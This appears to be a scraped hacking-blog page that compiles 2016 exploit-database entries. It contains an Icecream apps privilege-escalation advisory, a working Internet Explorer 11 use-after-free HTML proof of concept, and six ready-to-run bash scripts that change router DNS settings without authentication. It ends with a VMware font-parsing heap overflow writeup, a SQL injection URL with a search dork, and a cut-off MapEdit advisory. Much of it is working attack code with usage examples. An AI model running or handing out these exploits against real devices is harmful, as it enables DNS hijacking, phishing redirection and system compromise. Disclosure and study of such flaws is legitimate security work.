# Exploit Title: Multiple Icecream Apps Local Privilege Escalation
# Date: 13/09/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Vendor Homepage: icecreamapps.com
# Software Versions Affected: Icecream Ebook Reader 4.21 | Icecream Screen Recorder 4.21 | Icecream Screen Recorder 2.12
# Software Link: http://icecreamapps.com/Ebook-Reader/ | http://icecreamapps.com/Screen-Recorder/ | http://icecreamapps.com/Slideshow-Maker/
# Tested on: Windows 10 Professional x64 and Windows XP SP3 x86
1. Description:
The default installation directory for Icecream Ebook Reader is "C:\Program Files (x86)\Icecream Ebook Reader" with weak folder permissions that grants EVERYONE change/modify
privileges to the contents of the directory and it's subfolders. This allows an attacker opportunity for their own code execution under any other user running the
application. The same vulnerability exists for "Icecream Screen Recorder" as well as "Icecream Slideshow Maker".
2. Proof
C:\Program Files (x86)>icacls "Icecream Ebook Reader"
Icecream Ebook Reader Everyone:(OI)(CI)(M)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
C:\Program Files (x86)>icacls "Icecream Screen Recorder"
Icecream Screen Recorder Everyone:(OI)(CI)(M)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
C:\Program Files\Icecream Slideshow Maker Everyone:(OI)(CI)C
BUILTIN\Users:R
BUILTIN\Users:(OI)(CI)(IO)(special access:)
GENERIC_READ
GENERIC_EXECUTE
BUILTIN\Power Users:C
BUILTIN\Power Users:(OI)(CI)(IO)C
BUILTIN\Administrators:F
BUILTIN\Administrators:(OI)(CI)(IO)F
NT AUTHORITY\SYSTEM:F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)F
TULPA-842269BBB\Administrator:F
CREATOR OWNER:(OI)(CI)(IO)F
3. Exploit:
Simply replace any of the application exe's or any of the dll's with your preferred payload and wait for execution.
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
86398185
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="Expires" content="0" />
<meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" />
<meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" />
<meta http-equiv="Pragma" content="no-cache" />
<style type="text/css">
body{
background-color:lime;
font-color:red;
};
</style>
<script type='text/javascript'></script>
<script type="text/javascript" language="JavaScript">
/*
# Exploit Title: Internet Explorer 11 Use After Free
# Date: 05/09/2016 - 11/09/2016
# Exploit Author: Marcin Ressel
# Vendor Homepage: https://www.microsoft.com/pl-pl/
# Version: 11.0.9600.18482
# Tested on: Windows 7 (x64)
######################################################################################
0:014> g
(13a8.9b8): Access violation - code c0000005 (!!! second chance !!!)
eax=2f66abb0 ebx=00000001 ecx=2fbc8f08 edx=7ef8d000 esi=2fbc8f08 edi=2fbc8f08
eip=6d754a45 esp=1feac660 ebp=1feac674 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
MSHTML!CElement::SecurityContext+0x25:
6d754a45 8b80b8000000 mov eax,dword ptr [eax+0B8h] ds:002b:2f66ac68=????????
0:014> d @eax
2f66abb0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66abc0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66abd0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66abe0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66abf0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66ac00 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66ac10 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66ac20 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
0:014> kb
ChildEBP RetAddr Args to Child
1feac660 6d5e7c69 6d5e7500 1feac690 2fbc8f08 MSHTML!CElement::SecurityContext+0x25
1feac674 6d5e75cf 2fbc8f08 2fbc8f08 2fbc8f08 MSHTML!CMediaElement::RemoveFromPlayToElementTracker+0x1d
1feac688 6d5e7bee 1feac6a0 6d5e7bd0 00000004 MSHTML!CMediaElement::Shutdown+0xdc
1feac698 6d5e7b1c 48cfae30 50d00bb0 4542dbd0 MSHTML!CMediaElement::OnMarkupTearDown+0x1e
1feac6c4 6d3b23dc 00000000 4542dbd0 50d00bb0 MSHTML!CMarkup::InvokeMarkupTearDownCallbacks+0xc0
1feac6d8 6d3b22c9 00000001 00000001 341a8bb0 MSHTML!CMarkup::TearDownMarkupHelper+0xe4
1feac700 6d3adf1f 00000001 00000001 1feac7d0 MSHTML!CMarkup::TearDownMarkup+0x58
1feac7b0 6dae9665 341a8bb0 00000000 00000000 MSHTML!COmWindowProxy::SwitchMarkup+0x4eb
1feac894 6dae97e3 00005004 ffffffff 00000000 MSHTML!COmWindowProxy::ExecRefresh+0xa1c
1feac8a8 6d0d763b 457f1f68 00005004 00000001 MSHTML!COmWindowProxy::ExecRefreshCallback+0x23
1feac8f0 6d0cd4e2 91c55b56 00000000 6d0cc800 MSHTML!GlobalWndOnMethodCall+0x17b
1feac944 76b862fa 001401c6 00008002 00000000 MSHTML!GlobalWndProc+0x103
1feac970 76b86d3a 6d0cc800 001401c6 00008002 user32!InternalCallWinProc+0x23
1feac9e8 76b877d3 00000000 6d0cc800 001401c6 user32!UserCallWinProcCheckWow+0x109
1feaca4c 76b8789a 6d0cc800 00000000 1feafc28 user32!DispatchMessageWorker+0x3cb
1feaca5c 6e5fa8ac 1feaca9c 62382e48 2efb2fe0 user32!DispatchMessageW+0xf
1feafc28 6e620e88 1feafcf4 6e620b00 5cba2ff0 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464
1feafce8 74e4ad3c 62382e48 1feafd0c 6e614b00 IEFRAME!LCIETab_ThreadProc+0x3e7
1feafd00 6e593a31 5cba2ff0 00000000 6e5939a0 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1c
1feafd38 6fae9608 4b3b6fe8 705e0368 00000000 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94
############################################################################################
*/
var doc;
var trg, trg_parent;
function testcase()
{
var e1_frame = document.getElementById("e1");
doc = document;
e = e1_frame.contentWindow.document.createElement("hr");
rf = doc.body.appendChild(e);
e = e1_frame.contentWindow.document.createElement("audio");
rf = doc.body.appendChild(e);
dom = doc.getElementsByTagName("*");
document.getElementById("e1").removeNode(true);
trg = dom[14];
trg_parent = doc.body;
trg.addEventListener('DOMNodeRemoved',
new Function('',
//'try{trg.removeEventListener("DOMNodeRemoved",this,false);}catch(e){}'+
'try{trg.appendChild(document.createElement("feOffset")).removeNode(false).ATTRIBUTE_NODE = "false";}catch(e){}'+
'try{trg_parent = trg.cloneNode(true);}catch(e){}'//+
// 'try{doc = document.implementation.createDocument("about:blank","","text/html");}catch(e){}'
),
false);
trg_parent.innerHTML = trg.innerHTML;
//CollectGarbage();
//trg.innerHTML = "<h1></h1>"
setTimeout('location.reload();',700);
}
</script>
<title>Use After Free</title>
</head>
<body onload='testcase();'>
<iframe></iframe><iframe src='about:blank' id='e1'></iframe>
</body>
</html>
</html>
#!/bin/bash
#
# ASUS DSL-X11 ADSL Router Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " ASUS DSL-X11 ADSL Router "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
#!/bin/bash
#
# COMTREND ADSL Router CT-5367 C01_R12, CT-5624 C01_R03
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " COMTREND ADSL Router CT-5367 C01_R12, CT-5624 C01_R03"
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
#!/bin/bash
#
# Tenda ADSL2/2+ Modem 963281TAN
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " Tenda ADSL2/2+ Modem 963281TAN "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
#!/bin/bash
#
# PLANET VDR-300NU ADSL ROUTER
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " PLANET VDR-300NU ADSL ROUTER "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
#!/bin/bash
#
# PIKATEL 96338WS, 96338L-2M-8M Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " PIKATEL 96338WS, 96338L-2M-8M ADSL Router "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
#!/bin/bash
#
# Inteno EG101R1 VoIP Router
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " Inteno EG101R1 VoIP Router "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
#!/bin/bash
#
# Exper EWM-01 ADSL/MODEM
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " Exper EWM-01 ADSL MODEM/ROUTER"
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=849
As already discussed in a number of reports in this tracker (#285, #286, #287, #288, #289, #292), VMware Workstation (current version 12.1.1 build-3770994) ships with a feature called "Virtual Printers", which enables the virtualized operating systems to access printers installed on the Host. Inside the VM, the communication takes place through a COM1 device, and the incoming data is handled by a dedicated "vprintproxy.exe" process on the Host, as launched by the "vmware-vmx.exe" service. Administrative privileges are not required to access COM1 in the guest, at least on Windows.
The vprintproxy.exe is a significant attack surface for potential VM escapes. Due to its nature, the application implements support for a variety of complex protocols and file formats, such as the printing protocol, EMFSPOOL format, and further embedded EMFs, fonts, images etc. This report addresses a bug in the handling of TrueType fonts embedded in EMFSPOOL, as implemented in the TPView.DLL library extensively used by vprintproxy.exe.
The version of the TPView.DLL file referenced in this report is 9.4.1045.1 (md5sum b6211e8b5c2883fa16231b0a6bf014f3).
TrueType fonts can be embedded in EMFSPOOL files via EMRI_ENGINE_FONT records. When such a record is encountered while processing the printing request data, some complex logic is executed to load the font into the program's internal structures. For reasons which are not fully clear to me, one of the operations is to copy the contents of the CMAP table into the NAME table in memory - or, if the latter is larger than the former, create a completely new NAME table with CMAP's data. This is generally implemented in a function located at address 0x1005C230, and the high-level logic is as follows:
--- cut ---
CMAP = FindCmapTableHeader();
CMAP_size = ExtractSize(CMAP);
CMAP_body = ExtractBody(CMAP);
NAME = FindNameTableHeader();
if (NAME) {
NAME_size = ExtractSize(NAME);
NAME_body = ExtractBody(NAME);
SetTableSize(NAME, CMAP_size);
memset(NAME_body, 0, NAME_size);
if (CMAP_size > NAME_size) {
SetTableOffset(NAME, font_size);
font_data = realloc(font_size + CMAP_size);
memset(&font_data[font_size], 0, CMAP_size);
memcpy(&font_data[font_size], CMAP_body, CMAP_size);
} else {
memcpy(NAME_body, CMAP_body, CMAP_size);
}
}
--- cut ---
As you can see, the function doesn't perform any bounds checking of the values (offsets, sizes) loaded from table headers. Some of the fields have already been verified before and are guaranteed to be valid at this point of execution, but some of them (such as CMAP_body or NAME_size) are still fully controlled. While controlling the pointer to the CMAP section data (relative to the start of the font buffer) may be useful, being able to cheat about the NAME table size enables an attacker to cause a much more dangerous memory corruption on the heap.
For example, if we set the NAME size to an enormous value (e.g. 0xAAAAAAAA), we will encounter an immediate crash in the memset() function, as shown below:
--- cut ---
(22f0.26ac): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Common Files\ThinPrint\TPView.dll -
eax=01555540 ebx=00000000 ecx=215cefc0 edx=00000026 esi=215b87d4 edi=aaaaaaaa
eip=68102056 esp=2247f298 ebp=2247f2e8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
TPView!TPRenderW+0x1547f6:
68102056 660f7f4140 movdqa xmmword ptr [ecx+40h],xmm0 ds:002b:215cf000=????????????????????????????????
--- cut ---
If the NAME table size is increased by a smaller degree, such that the memset() call doesn't hit unmapped page boundary, the code may successfully finish the call and proceed to copying the contents of the CMAP section into the small NAME memory area, which would finally result in a typical heap-based buffer overflow condition with controlled length and data.
Attached is a Proof of Concept Python script, which connects to the COM1 serial port, and sends an EMFSPOOL structure containing a font file with the NAME table length set to 0xAAAAAAAA. When launched in a guest system, it should trigger the crash shown above in the vprintproxy.exe process on the host. The script is a slightly reworked version of Kostya's original exploit.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40398.zip
# Exploit Title: Contrexx CMS:egov moudle SQL injection
# Google Dork: inurl:?section=egov
# Date: 12/9/2016
# Exploit Author: hamidreza borghei
# Software Link: https://www.cloudrexx.com/de/index.php?section=downloads&cmd=7&category=8
# Version: 1.0.0
# Tested on: linux
sql injection in id parameter:
http://server/index.php?section=egov&cmd=details&id=[sql query]
# Security Advisory -- Multiple Vulnerabilities - MuM Map Edit
## Product
Vendor: Mensch und Maschine Software SE / Mensch und Maschine acadGraph GmbH
Product: MapEdit
Affected software version: 3.2.6.0
MuM MapEdit provides geodata to the internet and intranets and is deployed on several communal and
regional governmental infrastructures to provide geodata to the population. It consists of a
silverlight client and a C#.NET backend. The communication between them is HTTP/S based and involves
the NBFS (.NET Binary Format SOAP).
Link: http://www.mum.de/DE_Autodesk-Topobase-GIS-Datenerfassung-MuM-MapEdit.CAD
## Status/Metrics/Identifier
CVE-ID: tbd
CVSS v2 Vector: (AV:N/AC:L/Au:S/C:C/I:C/A:C)
CVSS Score: 9.0
The CVSS Score reflects the possibility of an attacker to upload web shells and execute them with
the privileges of the web server user.
## Author/Credits
Paul Baade (TÜV Rheinland i-sec GmbH)
Sven Krewitt (TÜV Rheinland i-sec GmbH)
